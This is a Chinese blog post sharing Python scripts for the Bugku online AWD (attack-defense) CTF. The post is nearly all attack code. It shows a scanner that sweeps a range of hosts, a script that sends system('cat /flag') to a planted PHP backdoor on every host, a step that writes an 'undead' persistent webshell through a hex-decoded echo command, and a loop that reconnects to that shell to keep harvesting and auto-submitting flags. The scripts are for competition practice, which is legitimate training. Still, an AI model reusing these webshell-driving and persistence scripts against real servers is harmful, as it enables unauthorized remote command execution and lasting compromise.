Bugku线上AWD脚本

最新推荐文章于 2023-11-07 17:59:07 发布

疯狂的1998

最新推荐文章于 2023-11-07 17:59:07 发布

阅读量2.6k

点赞数 8

分类专栏： CTF 文章标签： python 开发语言后端

本文链接：https://blog.csdn.net/MarkRao/article/details/120999639

版权

CTF 专栏收录该内容

16 篇文章 2 订阅

订阅专栏

Bugku手写小脚本（大佬就不用看了，鄙人水平有限）

首先是检测网站存活脚本

import urllib.request
import time
 
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/49.0.2')]

for n in range(1,255):
    nb = str(n)
    target = 'http://192-168-1-'+nb+'.awd.bugku.cn/'
    new = open('H:/Python3.0Work/AWD/bugkuwz.txt',mode='a+',encoding='utf-8')
    new.write(target)
    new.write('\n')

file = open('H:/Python3.0Work/AWD/bugkuwz.txt')
lines = file.readlines()
aa=[]
for line in lines:
	temp=line.replace('\n','')
	aa.append(temp)
 
print('存活网站如下：')
for a in aa:
	tempUrl = a
	try :
		opener.open(tempUrl)
		print(tempUrl)
	except urllib.error.HTTPError:
		# print(tempUrl+'     访问页面出错')
		time.sleep(0.5)
	except urllib.error.URLError:
		# print(tempUrl+'     访问页面出错')
		time.sleep(0.5)
	time.sleep(0.1)

连接预设后门脚本进行一系列操作


from urllib import request
import re
import requests

#连接预留木马进行flag的获取
def getflag():
	url = 'http://192-168-1-{}.awd.bugku.cn/a.php'  #已知马填写
	cmd = {'a' : "system('cat /flag')"}  #参数填写
	for i in range(1,255):
		try:
			r = requests.post(url.format(str(i)),data=cmd,timeout=2)
			f=open('H:/Python3.0Work/AWD/flag.txt',mode='a+',encoding='utf-8')
			f.write(r.text)
		except:
			pass

#连接预留木马进行内存马的注入
def Nodead():
	url = 'http://192-168-1-{}.awd.bugku.cn/a.php'  #已知马填写
	cmd = {'a' : "system('echo (注意这里填写十六进制转码后的不死马)|xxd -r -ps > bsm.php')"}  #参数[a]  进行写入不死马

	for i in range(1,255):
		try:
			r = requests.post(url.format(str(i)),data=cmd,timeout=1)
			print(r.url+'存在已知木马，已写入不死马请尽快执行不死马')
			response = request.urlopen('http://192-168-1-'+str(i)+'.awd.bugku.cn/bsm.php',timeout=1)
			res = response.read().decode('utf-8')
			print (res)
		except:
			pass

#提交flag
def intoflag():
	f=open('H:/Python3.0Work/AWD/flag.txt',mode='r+')
	while 1:
		flag = f.readline()
		if not flag:
			break
		else:
			F1 = re.sub('{','',flag)
			F2 = re.sub('}','',F1)
			F3 = re.sub('flag','',F2,1)
			response = request.urlopen('https://ctf.bugku.com/pvp/submit.html?token=[      ]&flag='+F3+'',timeout=1)
			res = response.read().decode('utf-8')
			print (res)
	f.close()

if __name__ =='__main__':
	print('Loading......')
	getflag()
	intoflag()
	Nodead()
	print('AttackOver！')

持续攻击（连接不死马）

import requests
import re
from urllib import request

def getflag():

	url = 'http://192-168-1-{}.awd.bugku.cn/.123.php'  #填写不死马的位置
	cmd = {'a' : "system('cat /flag')"}
	for i in range(1,255):
		try:
			b = requests.post(url.format(str(i)),data=cmd,timeout=1)
			f=open('H:/Python3.0Work/AWD/flag.txt',mode='a+',encoding='utf-8')
			f.write(b.text)
			f.close()
		except:
			pass

def intoflag():

	f=open('H:/Python3.0Work/AWD/flag.txt',mode='r+')
	while 1:
		flag = f.readline()
		if not flag:
			break
		else:
			F1 = re.sub('{','',flag)
			F2 = re.sub('}','',F1)
			F3 = re.sub('flag','',F2,1)
			response = request.urlopen('https://ctf.bugku.com/pvp/submit.html?token=[       ]&flag='+F3+'',timeout=1)
			res = response.read().decode('utf-8')
			print (res)

	f.close()

if __name__ =='__main__':
	print('后续攻击开始展开......')
	getflag()
	intoflag()
	print('AttackOver！')